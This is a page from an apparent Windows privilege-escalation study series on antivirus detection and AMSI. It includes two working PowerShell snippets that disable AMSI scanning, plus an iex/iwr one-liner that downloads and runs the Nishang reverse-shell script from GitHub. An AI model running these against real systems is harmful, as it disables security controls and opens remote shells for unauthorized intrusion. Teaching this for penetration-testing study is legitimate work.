HomeGitHubPortfolioTwitter/XMediumCont@ct

17 - AMSI Bypass

Topics

  1. Introduction to the Windows Shells

  2. Windows Permissions

  3. Reverse Shells in Windows

  4. SeImpersonatePrivilege Exploitation

  5. On Cross Compilation

  6. Windows Services

  7. Weak Service Permissions

  8. Unquoted Service Path

  9. DLL Hijacking

  10. Always Install Elevated

  11. Files with Sensitive Data

  12. Windows Hashes

  13. Stored Credentials and the Windows Vault

  14. Scheduled Task

  15. Critical Registry Paths

  16. Useful Tools

  17. AMSI Bypass

What is an Antivirus?

An antivirus is software designed to detect, prevent, and remove malicious software (malware). Its purpose is to protect systems from threats such as viruses, worms, trojans, spyware, and ransomware.

Modern antivirus software employs various detection techniques:

  1. Signature-Based Detection Matches files against a database of known malware signatures (e.g., MD5 hash).

  2. Static Analysis Examines file properties and code structure for suspicious patterns.

  3. Dynamic Analysis Observes program behavior in real-time or in isolated environments like sandboxes to identify malicious actions.

  4. Machine Learning Models Uses predictive algorithms to detect unknown threats based on behavioral patterns.

Related Technologies

Antivirus software often works in tandem with other security solutions:

  • Firewalls: Block unauthorized network traffic.

  • Endpoint Detection and Response (EDR): Provides advanced threat hunting and endpoint protection.

  • Intrusion Detection/Prevention Systems (IDPS): Monitor networks for malicious activity.

  • Web Application Firewalls (WAF): Protect web applications from common attacks like SQL injection and cross-site scripting (XSS).

Antivirus in Windows

Windows includes several built-in security technologies to safeguard users:

  1. Windows Defender Antivirus: Real-time protection against malware and viruses.

  2. Firewall & Network Protection: Blocks unauthorized traffic.

  3. Secure Boot: Prevents unauthorized software from running during startup.

  4. BitLocker: Encrypts disks to protect sensitive data.

  5. Windows Hello: Password-free authentication using biometrics.

Windows Antimalware Scan Interface (AMSI)

Introduced in 2015, AMSI is a standard interface for integrating security tools with Windows applications. AMSI scans memory, files, and script content for malicious behavior before execution.

Key Features of AMSI:

  • Supported by PowerShell, WMI, and Office macros.

  • Integrates with antivirus solutions for dynamic scans.

  • Useful for analyzing script-based attacks, such as those using PowerShell or JavaScript.

Workflow:

  1. The application requests a scan.

  2. AMSI sends the request to an antivirus provider.

  3. The antivirus scans the data and provides results.

Examples of AMSI Scanning:

  • PowerShell scripts

  • Office macros (e.g., VBA)

  • .NET assemblies

AMSI Bypass

Despite AMSI's robust design, attackers have developed techniques to bypass its protections. These bypasses typically exploit PowerShell or manipulate AMSI-related memory structures.

Modifying amsiContext

The System.Management.Automation.AmsiUtils class handles AMSI interactions in PowerShell. By modifying the amsiContext pointer to disable AMSI scans:

$fields=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetFields('NonPublic,Static')
$amsiContext=$fields | Where-Object { $_ -like "*Context" }
[IntPtr]$amsiContextPointer=$amsiContext.GetValue($null)
[Int32[]]$emptyBuffer = @(0)
[System.Runtime.InteropServices.Marshal]::Copy($emptyBuffer, 0, $amsiContextPointer, 1)

Setting amsiInitFailed

This bypass involves setting the amsiInitFailed flag to true:

$amsiInitFailedField=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetFields('NonPublic,Static') | Where-Object { $_.Name -like "amsiInitFailed" }
$amsiInitFailedField.SetValue($null, $true)

Demonstration of AMSI Blocking a Malicious Script

Attempting to load a malicious script like Invoke-PowerShellTcp.ps1 results in an AMSI warning:

iex (iwr "https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1" -UseBasicParsing).Content

Error:

This script contains malicious content and has been blocked by your antivirus software.

With the bypass, AMSI is disabled, allowing the script to execute.

Other Resources

Disclaimer

❗ Never use tools and techniques on real IP addresses, hosts or networks without proper authorization!

Previous16 - Useful ToolsNextCheatsheet

Last updated